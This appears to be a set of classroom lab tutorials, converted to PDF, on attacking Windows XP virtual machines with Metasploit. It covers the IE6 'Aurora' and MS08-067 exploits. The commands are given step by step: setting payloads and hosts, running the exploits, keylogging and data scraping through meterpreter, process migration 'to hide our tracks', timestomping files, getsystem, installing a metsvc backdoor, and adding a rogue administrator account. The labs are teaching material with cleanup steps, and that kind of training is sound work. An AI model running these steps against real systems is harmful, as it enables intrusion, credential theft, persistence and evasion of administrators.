0% found this document useful (0 votes)
2 views110 pages

Metasploit Tutorials For XP Operating System

The document provides a detailed guide on using the Metasploit framework to exploit vulnerabilities in Internet Explorer and Windows XP systems. It outlines prerequisites, steps to set up the environment, and instructions for executing exploits, specifically focusing on the 'Aurora' memory corruption flaw and MS08-067 vulnerability. Additionally, it emphasizes the importance of ethical use and legal disclaimers regarding the exploitation of these vulnerabilities.

Uploaded by

mshafiqsb
Copyright
© All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
2 views110 pages

Metasploit Tutorials For XP Operating System

The document provides a detailed guide on using the Metasploit framework to exploit vulnerabilities in Internet Explorer and Windows XP systems. It outlines prerequisites, steps to set up the environment, and instructions for executing exploits, specifically focusing on the 'Aurora' memory corruption flaw and MS08-067 vulnerability. Additionally, it emphasizes the importance of ethical use and legal disclaimers regarding the exploitation of these vulnerabilities.

Uploaded by

mshafiqsb
Copyright
© All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd

ComputerSecurityStudent (CSS)

HOME UNIX WINDOWS SECURITY TOOLS LECTURES FORENSICS SHOPPING CONTACT_US

|SECURITY TOOLS >> Metasploit |Views: 1333

(Metasploit windows/browser/ms10_002_aurora)
{ How To Crash Internet Exploder 6 }

Background Information
Metasploit Toolkit for
Reference Link: Penetration T...
David Maynor, Thom...
[Link] Best Price $10.80
[Link] or Buy New $43.05

Privacy Information
Internet Explorer "Aurora" Memory Corruption
This module exploits a memory corruption flaw in Internet Explorer. This
flaw was found in the wild and was a key component of the "Operation Aurora"
attacks that lead to the compromise of a number of high profile companies.
The exploit code is a direct port of the public sample published to the
Wepawet malware analysis site. The technique used by this module is
currently identical to the public sample, as such, only Internet Explorer 6
can be reliably exploited.

Prerequisite
1. Login to your Instructor VM, as username administrator
For those of you that do not have access to my class, Instructor VM is a
Windows XP Operating System.

2. Download Metasploit
[Link]

Penetration Tester's
Open Source Too...
3. Login to your WindowsVulnerable01 VM, as username student Jeremy Faircloth, ...
Best Price $21.00
For those of you that do not have access to my class, Instructor VM is a or Buy New
Windows XP Operating System running Windows Explor[d]er 6.
Privacy Information

4. On WindowsVulnerable01, discover your IP Address


Start --> Run --> cmd --> ipconfig

Writing Security Tools


and Exploits
James C. Foster, V...
Best Price $7.18
or Buy New $46.50

Privacy Information

Section 1: Fire Up Metasploit Console


1. On the Instructor VM, go to All Programs --> Metasploit Framework --> Metasploit
Console

converted by [Link]
Dissecting the Hack
Jayson E. Street, ...
Best Price $14.50
or Buy New $18.78

Privacy Information

SSH, The Secure Shell


2. NOTE: The Metasploit Console might take some time to load Daniel J. Barrett,...
When you see the below window then you know you will be ready. Best Price $16.96
or Buy New $27.26

Privacy Information

Pro OpenSSH
Michael Stahnke
Best Price $11.57
or Buy New $26.77

Privacy Information

Section 2: Searching for windows/browser/ms10_002_aurora


1. search aurora
The above command will show all exploits related to aurora. Implementing SSH
Himanshu Dwivedi
Best Price $0.01
or Buy New $35.00

Privacy Information

UNIX Shells by Example


2. use exploit/windows/browser/ms10_002_aurora Ellie Quigley
This command will tell msf which exploit to load. Best Price $22.88
or Buy New $35.78
NOTE: Your command prompt will change.

Privacy Information

Section 3: Setting the payload


1. show payloads

The payload is the actual code that will run on the target system after a
successful exploit attempt. Use the show payloads command to list all
payloads compatible with the current exploit. A Practical Guide to
Linux Commands,...

converted by [Link]
Mark G. Sobell
Best Price $16.74
or Buy New

Privacy Information

Linux Pocket Guide


Daniel J. Barrett
2. set PAYLOAD windows/meterpreter/reverse_tcp Best Price $0.90
or Buy New

Privacy Information

Section 4: Set Target IP Address and Exploit


1. set LHOST [Link]
Where [Link] is the IP address of WindowsVulnerable01. Please refer
to step 4 in the prerequisite section to obtain the IP address of
WindowsVulnerable01. Linux Administration
Wale Soyinka
Best Price $11.78
or Buy New $19.99

Privacy Information

2. set URIPATH [Link]


This will be the name of the webpage file the mis-informed user with Windows
Exploder 6 will click on.

Beginning Ubuntu Linux


Keir Thomas, Andy ...
3. exploit Best Price $6.99
Notice how msf starts up a daemon listening on port 8080 for the victim to or Buy New $29.19
make a connection by click on the web address
[Link]
NOTE: [Link] is the IP address of the Instructor VM Privacy Information

Practical Guide to
Fedora and Red Ha...
Mark G. Sobell
4. On WindowsVulnerable01, Bring up Windows Explorer 6 Best Price $2.11
or Buy New

Privacy Information
5. Place website address [Link] in the address
bar.
Click Go or press enter in the address text box in which your address is
located.

converted by [Link]
Beginning the Linux
Command Line
Sander van Vugt
Best Price $18.89
or Buy New $23.30

6. On the Instructor VM Privacy Information


Once the browser tries to load the page, you will see a msf message saying
'Sending Internet Explorer "Aurora" Memory Corruption to client
[Link].'

Unix and Linux System


Administration...
7. Back to the WindowsVulnerable VM Evi Nemeth, Garth ...
After your Windows Exploder tries to load the web page it will become un-
Buy New
stable, crash, and you will see the below Microsoft Message.
Privacy Information

Sun
Paul Sanghera
Best Price $1.97
or Buy New $35.41

Privacy Information

Proof of Lab
Solaris Operating
1. Cut and Paste a screen shot that looks similar to Step #6 in Section 4 into a Environment Boot C...
David Rhodes, Domi...
word document and upload to Moodle. Best Price $0.74
or Buy New

Privacy Information

AIX 5L Administration
Randal K. Michael
Best Price $15.20
or Buy New $36.22

Privacy Information

converted by [Link]
AIX for UNIX
Professionals
Bonnie L. Miller
Best Price $5.62
or Buy New $58.00

Privacy Information

HP-UX
Asghar Ghori
Best Price $46.51
or Buy New $50.52

Privacy Information

HP-UX 11i Version 2


System Administr...
Marty Poniatowski
Best Price $5.36
or Buy New $38.53

Privacy Information

BSD UNIX Toolbox


Christopher Negus,...

Buy New

Privacy Information

converted by [Link]
ComputerSecurityStudent (CSS)
HOME UNIX WINDOWS SECURITY TOOLS LECTURES FORENSICS SHOPPING CONTACT_US

|SECURITY TOOLS >> Metasploit |Views: 667

(Metasploit: MS08-067)
{ BackTrack5R1: Establishing A VNCShell & rdesktop to Victim Machine }
Metasploit Toolkit for
Penetration T...
Section 0. Background Information David Maynor, Thom...
Best Price $10.80
1. [Link] or Buy New $43.05
The vulnerability could allow remote code execution if an affected system
received a specially crafted RPC request. On Microsoft Windows 2000, Windows Privacy Information
XP, and Windows Server 2003 systems, an attacker could exploit this
vulnerability without authentication to run arbitrary code. It is possible
that this vulnerability could be used in the crafting of a wormable exploit.
Firewall best practices and standard default firewall configurations can
help protect network resources from attacks that originate outside the
enterprise perimeter.

Metasploit
David Kennedy, Jim...
2. Lab Notes Best Price $26.80
or Buy New $27.87
In this lab we will do the following:
1. Use Metasploit to Exploit Damn Vulnerable WXP-SP2
2. Create Attacker Account on Damn Vulnerable WXP-SP2
Privacy Information
3. rdesktop to Damn Vulnerable WXP-SP2 using newly created Attacker
Account.

3. Legal Disclaimer
As a condition of your use of this Web site, you warrant to
[Link] that you will not use this Web site for any
BackTrack 4
purpose that is unlawful or that is prohibited by these terms, conditions, Shakeel Ali, Tedi ...
and notices. Best Price $40.00
In accordance with UCC § 2-316, this product is provided with "no or Buy New $47.48

warranties, either express or implied." The information contained is


provided "as-is", with "no guarantee of merchantability."
Privacy Information
In addition, this is a teaching website that does not condone malicious
behavior of any kind.
Your are on notice, that continuing and/or using this lab outside your "own"
test environment is considered malicious and is against the law.
© 2012 No content replication of any kind is allowed without express written
permission.

Professional Penetration
Testing
Thomas Wilhelm
Section 1. Log into Damn Vulnerable WXP-SP2 Best Price $19.85
or Buy New $66.85
1. Start Up Damn Vulnerable WXP-SP2.
Instructions:
Privacy Information
1. Click on Damn Vulnerable WXP-SP2
2. Click on Edit virtual machine Settings
Note(FYI):
For those of you not part of my class, this is a Windows XP machine
running SP2.

converted by [Link]
Penetration Tester's
Open Source Too...
Jeremy Faircloth, ...
Best Price $21.00
or Buy New

Privacy Information

Writing Security Tools


and Exploits
James C. Foster, V...
Best Price $7.18
or Buy New $46.50

Privacy Information

Dissecting the Hack


Jayson E. Street, ...
2. Edit Virtual Machine Settings Best Price $14.50
or Buy New $18.78
Instructions:
1. Click on Network Adapter
2. Click on the Bridged Radio button Privacy Information
3. Click on the OK Button

SSH, The Secure Shell


Daniel J. Barrett,...
Best Price $16.96
or Buy New $27.26

Privacy Information

Pro OpenSSH
Michael Stahnke
Best Price $11.57
or Buy New $26.77

Privacy Information

3. Play Virtual Machine


Instructions:
Implementing SSH
1. Click on Damn Vulnerable WXP-SP2

converted by [Link]
Himanshu Dwivedi
2. Click on Play virtual machine Best Price $0.01
or Buy New $35.00

Privacy Information

UNIX Shells by Example


Ellie Quigley
Best Price $22.88
or Buy New $35.78

Privacy Information

A Practical Guide to
Linux Commands,...
Mark G. Sobell
Best Price $16.74
or Buy New

4. Logging into Damn Vulnerable WXP-SP2. Privacy Information


Instructions:
1. Username: administrator
2. Password: Use the Class Password or whatever you set it.

Linux Pocket Guide


Daniel J. Barrett
Best Price $0.90
or Buy New

Privacy Information

Linux Administration
Wale Soyinka
Best Price $11.78
or Buy New $19.99

Privacy Information

5. Open a Command Prompt


Instructions:
1. Start --> All Programs --> Accessories --> Command Prompt

converted by [Link]
Beginning Ubuntu Linux
Keir Thomas, Andy ...
Best Price $6.98
or Buy New $29.19

Privacy Information

Practical Guide to
Fedora and Red Ha...
Mark G. Sobell
Best Price $2.11
or Buy New

Privacy Information

Beginning the Linux


Command Line
6. Obtain Damn Vulnerable WXP-SP2's IP Address Sander van Vugt
Best Price $18.89
Instructions: or Buy New $23.30
1. ipconfig
Note(FYI): Privacy Information
In my case, Damn Vulnerable WXP-SP2's IP Address [Link].
This is the IP Address of the Victim Machine that will be attacked by
Metasploit.
Record your Damn Vulnerable WXP-SP2's IP Address.

Unix and Linux System


Administration...
Evi Nemeth, Garth ...

Buy New

Privacy Information

Sun
Paul Sanghera
Best Price $1.97
or Buy New $35.41

Privacy Information

Section 2. Log into BackTrack5

converted by [Link]
1. Start Up BackTrack5R1.
Solaris Operating
Instructions: Environment Boot C...
1. Start Up your VMware Player David Rhodes, Domi...
2. Play virtual machine Best Price $0.74
or Buy New

Privacy Information

AIX 5L Administration
Randal K. Michael
Best Price $15.20
or Buy New $36.22

Privacy Information

AIX for UNIX


Professionals
Bonnie L. Miller
Best Price $5.62
or Buy New $58.00

2. Login to BackTrack Privacy Information


Instructions:
1. Login: root
2. Password: toor or <whatever you changed it to>.

HP-UX
Asghar Ghori
Best Price $46.51
or Buy New $50.52

Privacy Information

HP-UX 11i Version 2


System Administr...
Marty Poniatowski
Best Price $5.36
or Buy New $38.53

Privacy Information

3. Bring up the GNOME


Instructions:

converted by [Link]
1. Type startx

BSD UNIX Toolbox


Christopher Negus,...

Buy New

Privacy Information

4. Start up a terminal window


Instructions:
1. Click on the Terminal Window

5. Obtain the IP Address


Instructions:
1. ifconfig -a
Note(FYI):
My IP address [Link]. In your case, it will probably be
different.
This is the machine that will be use to attack the victim machine (Damn
Vulnerable WXP-SP2).

converted by [Link]
Section 3. Starting up the Metasploit MSF Console
1. Start Up Metasploit msfconsole
Instructions:
1. Applications --> Exploitation Tools --> Network Exploitation Tools -->
Metasploit Framework --> msfconsole.
Note(FYI):
Metasploit takes about 5 to 20 seconds to start up.

2. msfconsole screen
Note(FYI):
This is the msfconsole

converted by [Link]
3. Search for the MS08-067 Exploit
Instructions:
1. search ms08_067

4. Use exploit MS08-067 Exploit


Instructions:
1. use exploit/windows/smb/ms08_067_netapi

converted by [Link]
5. Show Payloads
Instructions:
1. show payloads

6. Set Payloads
Instructions:
1. set PAYLOAD windows/vncinject/bind_tcp
2. Press <Enter>
Note:
This Payload will create a VNC Server/Shell Using TCP.

converted by [Link]
7. Show Options
Instructions:
1. show options
Note(FYI):
Notice the Required Column. RPORT and SMBPIPE are already populated,
but RHOST is not.
In the next step, you will populate RHOST with the IP Address of the
victim machine (Damn Vulnerable WXP-SP2).

8. Set RHOST and Verify


Note(FYI):

converted by [Link]
Replace [Link] with the IP Address of Damn Vulnerable WXP-SP2
obtained from (Section 1, Step 6).
Instructions:
1. set RHOST [Link]
2. show options
The Victim's IP Address is now set.

9. Exploit the Victim Machine


Instructions:
1. exploit
Note(FYI):
Notice that the vncinject stage was sent to the victim's IP Address.
(See Below).

converted by [Link]
10. Verify VNC TCP Connection
Instructions:
1. netstat -nao | findstr :4444
In my case, 1052 is the process ID for the VNC Metasploit session.
In your case it will be different.
Use your PID with the following command.
2. tasklist | findstr 1052

11. Create New Attacker Account


Instructions:
1. net user hacker33 abc123 /add
2. net localgroup administrators hacker33 /add

converted by [Link]
12. Open Control Panel
Instructions:
1. Start --> Control Panel

13. Open System


Instructions:
1. Double Click on System

converted by [Link]
14. Allow Remote Desktop
Instructions:
1. Click on the Remote Tab
2. Check Allow Remote Assistance invitations to be sent from the computer.
3. Check Allow users to connect remotely to this computer
4. Click OK

15. Reboot Damn Vulnerable WXP-SP2


Instructions:
1. shutdown /r
Note(FYI):

converted by [Link]
We are going to test the hacker33 account that we just created on Damn
Vulnerable WXP-SP2.

16. Start up a terminal window


Instructions:
1. Click on the Terminal Window

17. rdesktop to Damn Vulnerable WXP-SP2


Note(FYI):
Replace [Link] with the IP Address of Damn Vulnerable WXP-SP2
obtained from (Section 1, Step 6).
Instructions:
1. Wait until Damn Vulnerable WXP-SP2 has rebooted and is at the login

converted by [Link]
1. Wait until Damn Vulnerable WXP-SP2 has rebooted and is at the login
screen
2. rdesktop -u hacker33 -p abc123 [Link]

18. Open a Command Prompt


Instructions:
1. Start --> All Programs --> Accessories --> Command Prompt

19. Set Stronger Password


Instructions:
1. net user hacker33 s0m3t41ng!

converted by [Link]
Section 4. Proof of Lab
1. Proof of Lab
Instructions:
1. net user hacker33
2. date
Press enter twice.
3. echo "Your Name"
This should be your actual name.
e.g., echo "John Gray"
Proof of Lab Instructions:
1. Do a PrtScn
2. Past into a word document
3. Upload to Moodle.

converted by [Link]
2. Shutdown Damn Vulnerable WXP-SP2
Instructions:
1. shutdown -s -c "You've Been Hacked"

3. Power Off BackTrack5R1


Instructions:
1. poweroff

converted by [Link]
converted by [Link]
ComputerSecurityStudent (CSS)
HOME UNIX WINDOWS SECURITY TOOLS LECTURES FORENSICS SHOPPING CONTACT_US

|SECURITY TOOLS >> Metasploit |Views: 2092


(How To Update Metasploit)
{ svn co [Link] }

Metasploit Toolkit for


Background Information Penetration T...
David Maynor, Thom...
Reference Link: Best Price $10.80
or Buy New $43.05
[Link]
Privacy Information

Section 1
1. Login to your Backtrack VM, as username student or administrator
For those of you that do not have access to my class, Instructor VM is a
Windows XP Operating System.

2. sudo su -

3. svn co [Link]

4. Either use "t" for temporally accept or "p" for permanently access. Penetration Tester's
I choose "p" because the CA is from godaddy, which is pretty reliable. Open Source Too...
Jeremy Faircloth, ...
Best Price $21.00
or Buy New

Privacy Information

Writing Security Tools


After you press enter you will see a lot of output. Once it is finished, and Exploits
you will see a message at the very bottom, "Check Out revision XXXXX." James C. Foster, V...
Best Price $7.18
or Buy New $46.50

Privacy Information

converted by [Link]
Dissecting the Hack
Jayson E. Street, ...
Best Price $14.50
or Buy New $18.78

Privacy Information

SSH, The Secure Shell


Daniel J. Barrett,...
Best Price $16.96
or Buy New $27.26

Privacy Information

Pro OpenSSH
Michael Stahnke
Best Price $11.57
or Buy New $26.77

Privacy Information

Implementing SSH
Himanshu Dwivedi
Best Price $0.01
or Buy New $35.00

Privacy Information

UNIX Shells by Example


Ellie Quigley
Best Price $22.88
or Buy New $35.78

Privacy Information

converted by [Link]
A Practical Guide to
Linux Commands,...
Mark G. Sobell
Best Price $16.74
or Buy New

Privacy Information

Linux Pocket Guide


Daniel J. Barrett
Best Price $0.90
or Buy New

Privacy Information

Linux Administration
Wale Soyinka
Best Price $11.78
or Buy New $19.99

Privacy Information

Beginning Ubuntu Linux


Keir Thomas, Andy ...
Best Price $6.98
or Buy New $29.19

Privacy Information

Practical Guide to
Fedora and Red Ha...
Mark G. Sobell
Best Price $2.11
or Buy New

Privacy Information

converted by [Link]
Beginning the Linux
Command Line
Sander van Vugt
Best Price $18.89
or Buy New $23.30

Privacy Information

Unix and Linux System


Administration...
Evi Nemeth, Garth ...

Buy New

Privacy Information

Sun
Paul Sanghera
Best Price $1.97
or Buy New $35.41

Privacy Information

Solaris Operating
Environment Boot C...
David Rhodes, Domi...
Best Price $0.74
or Buy New

Privacy Information

AIX 5L Administration
Randal K. Michael
Best Price $15.20
or Buy New $36.22

Privacy Information

converted by [Link]
AIX for UNIX
Professionals
Bonnie L. Miller
Best Price $5.62
or Buy New $58.00

Privacy Information

HP-UX
Asghar Ghori
Best Price $46.51
or Buy New $50.52

Privacy Information

HP-UX 11i Version 2


System Administr...
Marty Poniatowski
Best Price $5.36
or Buy New $38.53

Privacy Information

BSD UNIX Toolbox


Christopher Negus,...

Buy New

Privacy Information

converted by [Link]
ComputerSecurityStudent (CSS)
HOME UNIX WINDOWS SECURITY TOOLS LECTURES FORENSICS SHOPPING CONTACT_US

|SECURITY TOOLS >> Metasploit |Views: 1344

(Metasploit: exploit/windows/browser/ms10_002_aurora)
{ exploit, migrate, keylogrecorder, scraper, metsvc }

Background Information
Metasploit Toolkit for
Reference Link: Penetration T...
David Maynor, Thom...
[Link] Best Price $10.80
[Link] or Buy New $43.05
[Link]
Privacy Information

Internet Explorer "Aurora" Memory Corruption


This module exploits a memory corruption flaw in Internet Explorer. This flaw was
found in the wild and was a key component of the "Operation Aurora" attacks that lead
to the compromise of a number of high profile companies. The exploit code is a direct
port of the public sample published to the Wepawet malware analysis site. The
technique used by this module is currently identical to the public sample, as such, Metasploit
only Internet Explorer 6 can be reliably exploited. David Kennedy, Jim...
Best Price $26.80
or Buy New $27.87

Prerequisite
Privacy Information
1. Login to your WindowsVulnerable01 VM, as username administrator
For those of you that do not have access to my class, WindowVulnerable01 VM is a
Windows XP Operating System, that happens to have many vulnerabilities including
Windows Explorer 6.

2. On WindowsVulnerable01, obtain your IP Address BackTrack 4


Command: Start --> Run --> CMD --> ipconfig Shakeel Ali, Tedi ...
Best Price $40.00
or Buy New $47.48

Privacy Information

Professional Penetration
3. Login to your Instructor VM, as username administrator Testing
For those of you that do not have access to my class, Instructor VM is a Windows Thomas Wilhelm
Best Price $19.85
XP Operating System or Buy New $66.85

Privacy Information
4. On Instructor VM, obtain your IP Address
Command: Start --> Run --> CMD --> ipconfig

Penetration Tester's
Open Source Too...
Jeremy Faircloth, ...
Best Price $21.00
or Buy New

converted by [Link]
Privacy Information
Section 1: Fire Up Metasploit Console
I. Note
If you prefer to use BackTrack's MSF Console Click Here, and continue to Section 2
to complete the rest of this lab.
If you prefer to use Window's MSF Console, please continue through Section 1.

1. On the Instructor VM, go to All Programs --> Metasploit Framework --> Metasploit
Console Writing Security Tools
and Exploits
James C. Foster, V...
Best Price $7.18
or Buy New $46.50

Privacy Information

Dissecting the Hack


Jayson E. Street, ...
2. NOTE: The Metasploit Console might take some time to load Best Price $14.50
or Buy New $18.78
When you see the below window then you know you will be ready.

Privacy Information

SSH, The Secure Shell


Daniel J. Barrett,...
Best Price $16.96
or Buy New $27.26

Privacy Information

Section 2: Searching for windows/browser/ms10_002_aurora


Pro OpenSSH
1. Command: search aurora Michael Stahnke
The above command will show all exploits related to aurora. Best Price $11.57
or Buy New $26.77

Privacy Information

Implementing SSH
Himanshu Dwivedi
Best Price $0.01
2. Command: use exploit/windows/browser/ms10_002_aurora or Buy New $35.00
This command will tell msf which exploit to load.
NOTE: Your command prompt will change.
Privacy Information

converted by [Link]
Section 3: Setting the payload
1. Command: show payloads
UNIX Shells by Example
The payload is the actual code that will run on the target system after a Ellie Quigley
successful exploit attempt. Use the show payloads command to list all payloads Best Price $22.88
compatible with the current exploit. or Buy New $35.78

Privacy Information

A Practical Guide to
Linux Commands,...
Mark G. Sobell
Best Price $16.74
or Buy New
2. Command: set PAYLOAD windows/shell/bind_tcp
Privacy Information

Section 4: Setting up the aurora exploit


1. Command: set SRVHOST [Link]
Where [Link] is the IP address of Instructor (metasploit machine). Linux Pocket Guide
Daniel J. Barrett
Best Price $0.90
or Buy New

Privacy Information
2. Command: set URIPATH aurora_exploit.html
This will be the name of the webpage file the mis-informed user with Windows
Exploder 6 will click on.

3. Command: exploit
Linux Administration
Notice how msf starts up a daemon listening on port 8080 for the victim to make a Wale Soyinka
connection by clicking on the web address Best Price $11.78
[Link] or Buy New $19.99

Privacy Information

4. On WindowsVulnerable01, Bring up Windows Explorer 6

Beginning Ubuntu Linux


5. Place website address [Link] in the address bar. Keir Thomas, Andy ...
Best Price $6.99
Click Go or press enter in the address text box in which your address is located. or Buy New $29.19

Privacy Information

converted by [Link]
6. On the Instructor VM
Once the browser tries to load the page, you will see a msf message saying
'Sending Internet Explorer "Aurora" Memory Corruption to client [Link].' Practical Guide to
NOTE: That there is not a command shell session between Instructor ([Link]) Fedora and Red Ha...
Mark G. Sobell
and WindowsVulnerable01 ([Link]) Best Price $2.11
or Buy New

Privacy Information

Beginning the Linux


Command Line
Sander van Vugt
7. On the Instructor VM Best Price $18.89
Command: Hit the Enter Key to get to a prompt. or Buy New $23.30
Command: sessions -l
The command "sessions" will show all the active connections between Instructor Privacy Information
(Attacking Machine) and WindowsVulnerable01 (Victim Machine).

Unix and Linux System


Administration...
Evi Nemeth, Garth ...

Buy New

Privacy Information

Section 5: Establishing an interpreter (a.k.a meterpreter)


1. On the Instructor VM
We will set the interpreter by issuing the following commands
Command: setg LHOST 192.168.110
This is the IP address of the Instructor VM (Hacker Machine)
Command: sessions -u 1
Sun
Paul Sanghera
Best Price $1.97
or Buy New $35.41
NOTE: The interpreter will start staging. After "Command Stager progress"
reaches 100% done, hit the <enter> key once to get back to the prompt. (See
Below). Privacy Information

2. On the Instructor VM Solaris Operating


Command: sessions -l Environment Boot C...
David Rhodes, Domi...
This command will NOW show you two sessions. Best Price $0.74
1. The first row contains the original shell you created when you set the or Buy New
payload earilier --> "set PAYLOAD windows/shell/bind_tcp".
2. The second row contains the interpreter you just connected too. Privacy Information

converted by [Link]
AIX 5L Administration
Randal K. Michael
Best Price $15.20
or Buy New $36.22

.
Privacy Information

3. On the Instructor VM, let's interact with the interpreter by issuing the following
command
Command: sessions -i 2

AIX for UNIX


Professionals
Bonnie L. Miller
Best Price $5.62
or Buy New $58.00
4. On the Instructor VM. You are now connected. You can see the system's process by
issuing the "ps" command.
Command: ps Privacy Information

HP-UX
Asghar Ghori
Best Price $46.51
or Buy New $50.52

Privacy Information

Section 6: run keylogrecorder


1. On the Instructor VM. So, lets see what we can do.
Command: run<space><tab><tab>
<space> means hit the space bar once.
HP-UX 11i Version 2
<tab> means hit the tab key, which needs to occur twice. System Administr...
Then when questioned to see all the possibilities, select "y". Marty Poniatowski
Best Price $5.36
or Buy New $38.53

Privacy Information

2. On the Instructor VM, let's run keylogrecorder, by issuing the following command
Command: run keylogrecorder
NOTE: The first red rectangle displays that victim's [Link] process was
migrated to 1712
NOTE: The second rectangle shows where the keylogrecorder log file is located
on the Instructor VM.
C:/Documents and
Settings/Instructor/.msf3/logs/scripts/keylogrecorder/192.168.1.108_20110601.[Link] BSD UNIX Toolbox
Christopher Negus,...

Buy New

Privacy Information

converted by [Link]
3. On the WindowsVulnerable01 VM, bring up notepad
START --> RUN --> notepad
Once notepad comes up, type whatever you want. (See Below).

4. On the Instructor VM, lets gets out of the keylogrecorder session


Command: <Ctrl>-c
Where <Ctrl> is the control key, which is held down simultaneously with the
"c" key.

5. On the Instructor VM, Open My Computer.

6. On the Instructor VM, let's look at the keylogrecorder log.


In Section 5, Step 2, my log file is located in C:/Documents and
Settings/Instructor/.msf3/logs/scripts/keylogrecorder/
In My Computer go to C:/Documents and Settings/Instructor/.msf3/logs/scripts/keylogrecorder/

7. On the Instructor VM, let's look at the contents of the keylogrecorder log file.
Open the text file similarly named to the file above. This file will display the
key strokes that were typed in WindowVulnerable01's notepad during the recording
session.

Section 7: run scraper


1. On the Instructor VM.
Go back to your msfconsole.
Command: run scraper
NOTE: This might take a while to run. Wait until it returns back the
meterpreter prompt.

converted by [Link]
2. On the Instructor VM, go back to my computer. We are not going to look at the
"scraper" log files.
In my computer, go to C:\Documents and
Settings\Instructor\.msf3\logs\scripts\scraper.
Notice all the various log files that are present.

3. File of Interest: [Link]


This file displays username and password, in which you can use a number of brute
force password cracking tools figure out.

4. File of Interest: [Link]


Notice that the entire C drive is shared to the world.

converted by [Link]
5. File of Interest: [Link]
This is a very nice report that displays Product Name and Hardware components

6. File of Interest: [Link]


This file displays all the services that are currently listening on
WindowVulnerable01.

Section 8: meterpreter commands


1. On the Instructor VM.
Command: ? <press enter>
Core Commands

converted by [Link]
File System Commands

System Commands
Notice you have the ability to drop to a shell, reboot the machine and
execute commands.

Section 9: Migrate to another pid

converted by [Link]
1. On the Instructor VM, find out what pid (process id) that you are connected too.
Command: getpid

2. On the Instructor VM, look for your pid using the ps command.
Command: ps
Notice my pid of 1712 matches up to [Link] which is the executable name
for Microsoft Internet Explorer 6.

3. On the Instructor VM, let's migrate from [Link] (pid = 1712) to [Link]
(pid = 636). Above you will see that the [Link]'s pid is 1712 and
[Link]'s pid is 636. Are goal is to make our process ([Link]) appears as
a typical looking process (like [Link]).
Command: migrate 636

Command: getpid
Now you have successfully attach the interpreter from [Link] to
[Link].
Why did we do this you ask? To hide our tracks of course.

4.

Section 10: Upload Feature


1. On the Instructor VM, open notepad.
Start --> Run --> Notepad or select it from the Start menu

converted by [Link]
2. On the Instructor VM, type in notepad whatever you want.
Save this file directly under C:\
Name it aurora_exploit.txt
Keep in mind this is a non-malicious text file.
However, you could put some sort of trojan horse in its place.

3. On the Instructor VM, upload the aurora_exploit.txt file from Instructor to


WindowsVulenerable01
Command: upload C:\\aurora_exploit.txt C:\\
"uploaded" - means that the file was successfully uploaded

4. On the WindowsVulnerable01 VM, bring up my computer.


Go to C:\, and you should see the aurora_exploit.txt located in the directory.

converted by [Link]
5. On the Instructor VM, cd to C:\
Command: pwd
Will show you wehre you are
Command: cd ../../
In my case, I was in C:\WINDOWS\system32 and I only need to go back two
directories to get to C:\.

6. On the Instructor VM, use the "ls" command to see file as well.
Command: ls
Below you can see that aurora_exploit.txt is listed under WindowsVulnerable01 C:\.

7. On the Instructor VM, let's load the privilege options.


Command: use priv
This will load the privilege options.

Command: ?
The "?" will show you all the possible command.

converted by [Link]
8. On the Instructor VM, let's use timestomp to change the timestamp of
aurora_exploit.txt.
Command: timestomp help

Command: timestomp aurora_exploit.txt -f [Link]


This command will change the timestamp of the aurora_exploit.txt to the
timestamp of the [Link] file.

Command: ls
Notice that aurora_exploit.txt and [Link] now have the same time stamp.
Why are we changing the timestamp? Hacker's know administrators are more
likely to spot a file with a recent timestamp as opposed to not delete a file
with a very old time stamp.

Section 11: getsystem and install backdoor


1. On the Instructor VM, we will use the "getsystem" command to gain system privileges.
Command: getsystem
Notice that your userID is 1.
User system is the highest privilege account on a windows box.

converted by [Link]
2. On the Instructor VM, we will use the "run metsvc" command to install a server on
WindowsVulnerable01.
Command: run metsvc
The backdoor will run on port 31337.

Command: ps
Look for the [Link] to verify the backdoor is in place.

Command: ipconfig
Just out of habit, re-verify the IP address of the victim computer
WindowsVulnerable01.

3. On the WindowsVulnerable01 VM, let's use nestat to see the process.


Start --> Run --> cmd
Command: netstat -nao
Notice that there is a local process listening on port 31337.

4. On the Instructor VM, we are going to test our newly created backdoor. So, totally
exit out of the msfconsole.

converted by [Link]
Command: exit
Command: exit
Command: exit -y
If using windows, your window will eventually close.
If using unix, it will drop you back to a command prompt.

5. On the Instructor VM, go to All Programs --> Metasploit Framework --> Metasploit
Console

6. On the Instructor VM, we will use the multi/handler exploit.


Command: use exploit/multi/handler

7. On the Instructor VM, we will set the payload.


Command: set PAYLOAD windows/metsvc_bind_tcp

8. On the Instructor VM, set the LPORT


Command: set LPORT 31337
31337 is the backdoor listening port on WindowsVulnerable01

9. On the Instructor VM, set the RHOST


Command: set RHOST [Link]
RHOST is the IP address of the WindowsVulnerable01

10. On the Instructor VM, let's connect to WindowVulnerable01 using the exploit command
Command: exploit
Congrats!!! You are connected!!!

converted by [Link]
11. On the Instructor VM, just to a basic "ps" command to look at the processes.
Command: ps

Section 12: Cleanup and remove back door


1. On the Instructor VM, issue the "ps" command and look for any processes named metsvc.
Command: ps
Notice there are two processes.
C:\WINDOWS\TEMP\ZORYrBRfHDpnROg\[Link]
NOTE: Be sure and record the above directory structure highlighted in
yellow. Yours will be different of course. You will need this for
step 4.
C:\WINDOWS\TEMP\ZORYrBRfHDpnROg\[Link]

2. On the Instructor VM, do a screen print of Step 1, in Section 12 above and submit to
moodle.

3. On the Instructor VM,let's exit completely out of the msfconsole.


Command: exit
Command: exit

4. On the WindowVulnerable01 VM, we will shutdown the metsvc service.


Go to Control Panel --> Administrative Tools --> Services
Search for meterpreter.
Right Click on meterpreter
Select Properties

converted by [Link]
Startup type: Disabled
Select the Stop Button
Select Apply and OK

Verify Meterpreter is Disabled

5. On the WindowVulnerable01 VM, we will need to remove the metsvc registry keys.
Start --> Run --> regedit
Highlight My Computer

converted by [Link]
Go to Edit --> Find

Search for "metsvc" (See Below).

Your search will display the following results

Right Click on LEGACY_METSVC


Select Delete

6. On the WindowVulnerable01 VM, we will now remove the backdoor.


Fire up My Computer
Navigate to C:\WINDOWS\TEMP\ZORYrBRfHDpnROg\
Delete all the files and reboot your WindowsVulnerable01.

converted by [Link]
7. On the WindowVulnerable01 VM, Reboot your machine

Proof of Lab
1. On the Instructor VM, do a screen print of Step 1, in Section 12 above and submit to
moodle.

converted by [Link]
ComputerSecurityStudent (CSS)
HOME UNIX WINDOWS SECURITY TOOLS LECTURES FORENSICS SHOPPING CONTACT_US

|SECURITY TOOLS >> Metasploit |Views: 1119

(Metasploit: MS08-067)
